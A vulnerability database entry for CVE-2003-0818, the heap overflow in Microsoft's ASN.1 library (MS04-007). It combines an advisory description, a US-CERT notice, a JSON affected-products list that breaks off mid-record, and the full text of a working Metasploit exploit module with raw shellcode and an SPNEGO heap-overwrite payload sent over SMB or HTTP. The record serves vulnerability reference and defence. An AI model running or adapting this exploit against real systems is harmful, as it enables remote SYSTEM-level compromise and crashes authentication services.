Search criteria
67 vulnerabilities found for messenger by yahoo
VAR-200403-0051
Vulnerability from variot - Updated: 2025-04-03 20:57Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##
$Id$
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
Framework web site for more information on licensing and terms of use.
http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. Both vulnerabilities were fixed in the
MS04-007 patch.
You are only allowed one attempt with this vulnerability. If
the payload fails to execute, the LSASS system service will
crash and the target system will automatically reboot itself
in 60 seconds. If the payload succeeeds, the system will no
longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A
reboot is required to restore proper functioning of an
exploited system.
This exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
},
'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
'License' => GPL_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0818'],
[ 'OSVDB', '3902' ],
[ 'BID', '9633'],
[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
[ 'MSB', 'MS04-007'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
{
'Platform' => 'win',
},
],
],
'DisclosureDate' => 'Feb 10 2004',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
], self.class)
end
# This exploit is too destructive to use during automated exploitation.
# Better Windows-based exploits exist at this time (Sep 2006)
def autofilter
false
end
# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
# as a Metasploit Framework module with his permission. This module is only
# licensed under GPLv2, keep this in mind if you embed the Framework into
# a non-GPL application. -hdm[at]metasploit.com
def exploit
# The first stage shellcode fixes the PEB pointer and cleans the heap
stage0 =
"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
"\x08\x00\xeb\xfe"
token = spnego_token(stage0, payload.encoded)
case datastore['PROTO']
when 'smb'
exploit_smb(token)
when 'http'
exploit_http(token)
else
print_status("Invalid application protocol specified, use smb or http")
end
end
def exploit_smb(token)
connect
client = Rex::Proto::SMB::Client.new(sock)
begin
client.session_request(smb_hostname()) if not datastore['SMBDirect']
client.negotiate
client.session_setup_ntlmv2_blob(token)
rescue => e
if (e.to_s =~ /error code 0x00050001/)
print_status("The target system has already been exploited")
else
print_status("Error: #{e}")
end
end
handler
disconnect
end
def exploit_http(token)
connect
req = "GET / HTTP/1.0\r\n"
req << "Host: #{ datastore['RHOST']}\r\n"
req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
sock.put(req)
res = sock.get_once
if (res and res =~ /0x80090301/)
print_status("This server does not support the Negotiate protocol or has already been exploited")
end
if (res and res =~ /0x80090304/)
print_status("This server responded with error code 0x80090304 (wth?)")
end
handler
disconnect
end
# Returns an ASN.1 encoded string
def enc_asn1(str)
Rex::Proto::SMB::Utils::asn1encode(str)
end
# Returns an ASN.1 encoded bit string with 0 unused bits
def enc_bits(str)
"\x03" + enc_asn1("\x00" + str)
end
# Returns a BER encoded constructed bit string
def enc_constr(*str_arr)
"\x23" + enc_asn1(str_arr.join(''))
end
# Returns a BER encoded SPNEGO token
def spnego_token(stage0, stage1)
if !(stage0 and stage1)
print_status("Invalid parameters passed to spnego_token")
return
end
if (stage0.length > 1032)
print_status("The stage 0 shellcode is longer than 1032 bytes")
return
end
tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
if ((tag.length + stage1.length) > 1033)
print_status("The stage 1 shellcode is too long")
return
end
# The first two overwrites must succeed, so we write to an unused location
# in the PEB block. We don't care about the values, because after this the
# doubly linked list of free blocks is corrupted and we get to the second
# overwrite which is more useful.
fw = "\xf8\x0f\x01\x00" # 0x00010ff8
bk = "\xf8\x0f\x01"
# The second overwrite writes the address of our shellcode into the
# FastPebLockRoutine pointer in the PEB
peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
bitstring = enc_constr(
enc_bits("A" * 1024),
"\x03\x00",
enc_constr(
enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
enc_constr( enc_bits(fw + bk) ),
enc_constr(
enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
enc_constr(
enc_bits("\xeb\x06" + make_nops(6)),
enc_bits("D" * 1040)
)
)
)
)
token = "\x60" + enc_asn1( # Application Constructed Object
"\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
"\xa0" + enc_asn1( # NegTokenInit (0xa0)
"\x30" + enc_asn1(
"\xa1" + enc_asn1(
bitstring
)
)
)
)
return token
end
end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Multiple Vulnerabilities in Microsoft ASN.1 Library
Original issue date: February 10, 2004 Last revised: -- Source: US-CERT
A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic.
Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.
Solution
Apply a patch
Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.
Vendor Information
This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.
Microsoft
Please see Microsoft Security Bulletin MS04-007.
References
* Vulnerability Note VU#216324 -
<http://www.kb.cert.org/vuls/id/216324>
* Vulnerability Note VU#583108 -
<http://www.kb.cert.org/vuls/id/583108>
* eEye Digital Security Advisory AD20040210 -
<http://www.eeye.com/html/Research/Advisories/AD20040210.html>
* eEye Digital Security Advisory AD20040210-2 -
<http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
* Microsoft Security Bulletin MS04-007 -
<http://microsoft.com/technet/security/bulletin/MS04-007.asp>
* Microsoft Knowledge Base Article 252648 -
<http://support.microsoft.com/default.aspx?scid=252648>
_________________________________________________________________
These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. ___________
Feedback can be directed to the author, Art Manion.
Copyright 2004 Carnegie Mellon University.
Revision History
February 10, 2004: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200403-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "*"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "*"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "web"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "enterprise"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "enterprise_64-bit"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "r2"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "standard"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1358"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1356"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1355"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1351"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1347"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.5"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.1"
},
{
"model": "windows xp professional sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp professional",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp 64-bit edition version sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows xp 64-bit edition version",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows xp 64-bit edition sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp 64-bit edition",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server web edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server enterprise edition itanium",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server datacenter edition itanium",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows nt workstation sp6a",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp6a",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows 98se",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "98"
},
{
"model": "windows server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "quicken",
"scope": "eq",
"trust": 0.9,
"vendor": "intuit",
"version": "2003"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.2.3292"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.1.3036"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.0.2938"
},
{
"model": "windows 2000",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (server)"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (terminal_srv)"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (workstation)"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "none"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.6,
"vendor": "yahoo",
"version": "5.5.1249"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.6,
"vendor": "yahoo",
"version": "5.5"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.2"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.1"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.10"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.00"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.04"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.02"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.02"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.03"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.0"
},
{
"model": "turbotax",
"scope": "eq",
"trust": 0.6,
"vendor": "intuit",
"version": "2003"
},
{
"model": "instant messenger beta",
"scope": "eq",
"trust": 0.6,
"vendor": "aol",
"version": "5.5.3415"
},
{
"model": "xmlspy professional edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy professional edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy home edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy home edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy enterprise edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy enterprise edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "6.0"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "5.0.5"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "5.0"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp1"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "professional"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "server"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "advanced_server"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.8"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.7"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.6"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.5"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.0"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "2.4"
},
{
"model": "small business server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20000"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0"
},
{
